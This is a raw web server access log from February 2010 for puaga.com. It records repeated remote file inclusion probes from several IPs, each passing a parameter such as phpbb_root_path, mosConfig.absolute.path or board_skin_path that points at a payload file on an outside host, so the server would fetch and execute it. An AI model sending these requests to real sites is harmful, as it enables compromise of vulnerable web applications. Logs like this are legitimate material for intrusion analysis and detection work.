58.230.162.220 - - [25/Feb/2010:05:49:08 -0800] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:05:49:08 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:05:49:08 -0800] "GET /logs/access_100201.log%20%20/components/com_forum/download.php?phpbb_root_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:05:49:10 -0800] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:05:49:10 -0800] "GET /logs/access_100201.log%20%20/components/com_forum/download.php?phpbb_root_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:05:49:10 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:05:49:22 -0800] "GET /logs/access_100211.log%20%20/components/com_forum/download.php?phpbb_root_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [25/Feb/2010:05:49:25 -0800] "GET /logs/access_100211.log%20%20/components/com_forum/download.php?phpbb_root_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.206.206.28 - - [25/Feb/2010:05:49:30 -0800] "GET /logs//bbs/delete_comment.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.206.206.28 - - [25/Feb/2010:05:49:30 -0800] "GET /bbs/delete_comment.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.206.206.28 - - [25/Feb/2010:05:49:30 -0800] "GET /logs/access_100203.log//bbs/delete_comment.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.51.24.246 - - [25/Feb/2010:05:49:35 -0800] "GET /component//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.51.24.246 - - [25/Feb/2010:05:49:35 -0800] "GET /logs//component//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.51.24.246 - - [25/Feb/2010:05:49:35 -0800] "GET /logs/access_100208.log//component//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.206.206.28 - - [25/Feb/2010:05:49:51 -0800] "GET /logs/access_100206.log//bbs/delete_comment.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:05:50:21 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://www.4bwd.com//images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:05:50:21 -0800] "GET /logs/access_100201.log/components/com_forum/download.php?phpbb_root_path=http://www.4bwd.com//images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:05:50:21 -0800] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://www.4bwd.com//images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:05:51:04 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://www.4bwd.com//images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:05:51:04 -0800] "GET /logs/access_100201.log%20%20/components/com_forum/download.php?phpbb_root_path=http://www.4bwd.com//images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:05:51:04 -0800] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://www.4bwd.com//images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:05:51:15 -0800] "GET /logs/access_100211.log%20%20/components/com_forum/download.php?phpbb_root_path=http://www.4bwd.com//images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:05:52:19 -0800] "GET /lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:05:52:22 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:05:52:22 -0800] "GET /logs/access_100218.log%20%20/lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:05:52:30 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:05:52:30 -0800] "GET /logs/access_100201.log/components/com_forum/download.php?phpbb_root_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:05:52:30 -0800] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:05:52:46 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:05:52:47 -0800] "GET /logs/access_100218.log%20%20/lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:05:52:52 -0800] "GET /lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:05:52:54 -0800] "GET /lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:05:52:55 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:05:52:55 -0800] "GET /logs/access_100218.log%20%20/lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:05:53:36 -0800] "GET /logs/access_100219.log%20%20/lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:05:53:36 -0800] "GET /logs/access_100219.log%20%20/lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:05:53:45 -0800] "GET /logs/access_100219.log%20%20/lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [25/Feb/2010:05:54:07 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.enyzone.cz/components/com_poll/ts???? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.puaga.com"
212.241.177.123 - - [25/Feb/2010:05:54:07 -0800] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.enyzone.cz/components/com_poll/ts???? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:05:55:07 -0800] "GET /logs/access_100129.log//toolbar.php?dirDepth=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:05:55:07 -0800] "GET /logs/access_100127.log//toolbar.php?dirDepth=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:05:55:37 -0800] "GET /logs/access_100218.log%20%20/lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:05:55:42 -0800] "GET /lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:05:55:42 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [25/Feb/2010:05:55:50 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.selman-motoren.de//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [25/Feb/2010:05:55:50 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.selman-motoren.de//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [25/Feb/2010:05:55:50 -0800] "GET /logs/access_100214.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.selman-motoren.de//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.103.72.130 - - [25/Feb/2010:05:55:53 -0800] "GET /delete_all.php?board_skin_path=http://www.kecschool.co.kr/upfiles/c055/tp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.puaga.com"
83.103.72.130 - - [25/Feb/2010:05:55:53 -0800] "GET /logs//delete_all.php?board_skin_path=http://www.kecschool.co.kr/upfiles/c055/tp??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:05:55:57 -0800] "GET /logs/access_100218.log%20%20/lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:05:56:00 -0800] "GET /lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:05:56:00 -0800] "GET /logs/lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.225.42.178 - - [25/Feb/2010:05:56:42 -0800] "GET /logs/access_100213.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.selman-motoren.de//administrator/components/com_virtuemart/Oid1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:05:56:54 -0800] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://www.4bwd.com//images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:05:56:54 -0800] "GET /logs/access_100201.log/components/com_forum/download.php?phpbb_root_path=http://www.4bwd.com//images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:05:56:54 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://www.4bwd.com//images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [25/Feb/2010:05:56:57 -0800] "GET /logs/access_100219.log%20%20/lostpasswd.php?env[include_prefix]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:05:57:48 -0800] "GET /logs/access_100211.log/components/com_forum/download.php?phpbb_root_path=http://www.4bwd.com//images/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:05:58:23 -0800] "GET /logs/access_100201.log%20%20/components/com_forum/download.php?phpbb_root_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:05:58:29 -0800] "GET /logs/access_100211.log%20%20/components/com_forum/download.php?phpbb_root_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:05:58:42 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://kmgtusa.com/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:05:58:42 -0800] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://kmgtusa.com/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:05:58:42 -0800] "GET /logs/access_100201.log%20%20/components/com_forum/download.php?phpbb_root_path=http://kmgtusa.com/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:05:58:51 -0800] "GET /logs/access_100211.log%20%20/components/com_forum/download.php?phpbb_root_path=http://kmgtusa.com/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:05:59:48 -0800] "GET /plugins/payment/cc_core/cc_core.inc.php?config[root_dir]=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "puaga.com"
65.60.10.18 - - [25/Feb/2010:05:59:48 -0800] "GET /module//plugins/payment/cc_core/cc_core.inc.php?config[root_dir]=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "puaga.com"
65.60.10.18 - - [25/Feb/2010:05:59:48 -0800] "GET /module/setup.php//plugins/payment/cc_core/cc_core.inc.php?config[root_dir]=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 200 1720 "-" "Mozilla/5.0" "puaga.com"
65.60.10.18 - - [25/Feb/2010:05:59:54 -0800] "GET /plugins/payment/cc_core/cc_core.inc.php?config[root_dir]=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "puaga.com"
65.60.10.18 - - [25/Feb/2010:05:59:54 -0800] "GET /module//plugins/payment/cc_core/cc_core.inc.php?config[root_dir]=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "puaga.com"
65.60.10.18 - - [25/Feb/2010:05:59:54 -0800] "GET /module/setup.php//plugins/payment/cc_core/cc_core.inc.php?config[root_dir]=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 200 1720 "-" "Mozilla/5.0" "puaga.com"
65.60.10.18 - - [25/Feb/2010:06:00:06 -0800] "GET /plugins/payment/cc_core/cc_core.inc.php?config[root_dir]=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "puaga.com"
65.60.10.18 - - [25/Feb/2010:06:00:06 -0800] "GET /module//plugins/payment/cc_core/cc_core.inc.php?config[root_dir]=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "puaga.com"
65.60.10.18 - - [25/Feb/2010:06:00:07 -0800] "GET /module/setup.php//plugins/payment/cc_core/cc_core.inc.php?config[root_dir]=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.0" 200 1704 "-" "Mozilla/5.0" "puaga.com"
110.45.145.178 - - [25/Feb/2010:06:00:41 -0800] "GET /amboard//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [25/Feb/2010:06:00:41 -0800] "GET /logs//amboard//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.145.178 - - [25/Feb/2010:06:00:41 -0800] "GET /logs/access_100201.log%20%20//amboard//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:06:02:13 -0800] "GET /logs/access_100211.log/components/com_forum/download.php?phpbb_root_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:06:02:53 -0800] "GET /logs/access_100201.log/components/com_forum/download.php?phpbb_root_path=http://kmgtusa.com/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.124.116.194 - - [25/Feb/2010:06:03:03 -0800] "GET /logs/access_100211.log/components/com_forum/download.php?phpbb_root_path=http://kmgtusa.com/includes/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [25/Feb/2010:06:03:26 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [25/Feb/2010:06:03:26 -0800] "GET /logs/access_100209.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.46.87.243 - - [25/Feb/2010:06:03:27 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:06:05:09 -0800] "GET /module/setup.php%20%20//plugins/payment/cc_core/cc_core.inc.php?config[root_dir]=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "puaga.com"
65.60.10.18 - - [25/Feb/2010:06:05:14 -0800] "GET /module/setup.php%20%20//plugins/payment/cc_core/cc_core.inc.php?config[root_dir]=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "puaga.com"
91.206.206.28 - - [25/Feb/2010:06:05:33 -0800] "GET /logs/access_100206.log//bbs/delete_comment.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.206.206.28 - - [25/Feb/2010:06:05:33 -0800] "GET /logs/access_100203.log//bbs/delete_comment.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.206.206.28 - - [25/Feb/2010:06:05:33 -0800] "GET /logs//bbs/delete_comment.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.206.206.28 - - [25/Feb/2010:06:05:33 -0800] "GET /bbs/delete_comment.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.60.10.18 - - [25/Feb/2010:06:05:52 -0800] "GET /module/setup.php%20%20//plugins/payment/cc_core/cc_core.inc.php?config[root_dir]=http://www.efly.lu///includes/js/ThemeOffice/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "puaga.com"
91.206.206.28 - - [25/Feb/2010:06:06:25 -0800] "GET /bbs/delete_comment.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.206.206.28 - - [25/Feb/2010:06:06:25 -0800] "GET /logs//bbs/delete_comment.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.206.206.28 - - [25/Feb/2010:06:06:25 -0800] "GET /logs/access_100203.log%20%20//bbs/delete_comment.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.206.206.28 - - [25/Feb/2010:06:06:35 -0800] "GET /logs/access_100203.log%20%20//write_comment_update.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.206.206.28 - - [25/Feb/2010:06:06:35 -0800] "GET /write_comment_update.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.206.206.28 - - [25/Feb/2010:06:06:35 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.206.206.28 - - [25/Feb/2010:06:06:50 -0800] "GET /logs/access_100206.log%20%20//write_comment_update.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.101.173.154 - - [25/Feb/2010:06:07:36 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; spbot/2.0; +http://www.seoprofiler.com/bot/ )" "puaga.com"
75.101.173.154 - - [25/Feb/2010:06:07:36 -0800] "GET /orange_g/forum/viewtopic.php?p=28204 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; spbot/2.0; +http://www.seoprofiler.com/bot/ )" "puaga.com"
91.206.206.28 - - [25/Feb/2010:06:08:29 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.206.206.28 - - [25/Feb/2010:06:08:30 -0800] "GET /write_comment_update.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.206.206.28 - - [25/Feb/2010:06:08:30 -0800] "GET /logs/access_100206.log//write_comment_update.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.206.206.28 - - [25/Feb/2010:06:08:30 -0800] "GET /logs/access_100203.log//write_comment_update.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.93.134.178 - - [25/Feb/2010:06:08:31 -0800] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.93.134.178 - - [25/Feb/2010:06:08:31 -0800] "GET /mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.93.134.178 - - [25/Feb/2010:06:08:31 -0800] "GET /logs/access_100118.log%20%20//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.206.206.28 - - [25/Feb/2010:06:08:45 -0800] "GET /bbs/delete_comment.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.206.206.28 - - [25/Feb/2010:06:08:45 -0800] "GET /logs//bbs/delete_comment.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.206.206.28 - - [25/Feb/2010:06:08:45 -0800] "GET /logs/access_100203.log//bbs/delete_comment.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.206.206.28 - - [25/Feb/2010:06:08:54 -0800] "GET /logs/access_100203.log//write_comment_update.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.206.206.28 - - [25/Feb/2010:06:08:54 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.206.206.28 - - [25/Feb/2010:06:08:54 -0800] "GET /write_comment_update.php?board_skin_path=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.206.206.28 - - [25/Feb/2010:06:08:55 -0800] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.206.206.28 - - [25/Feb/2010:06:08:55 -0800] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.206.206.28 - - [25/Feb/2010:06:08:55 -0800] "GET /logs/access_100208.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://kmgtusa.com/includes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.25.99 - - [25/Feb/2010:06:09:00 -0800] "GET /logs/access_100209.log//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.25.99 - - [25/Feb/2010:06:09:00 -0800] "GET /logs//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.122.25.99 - - [25/Feb/2010:06:09:01 -0800] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
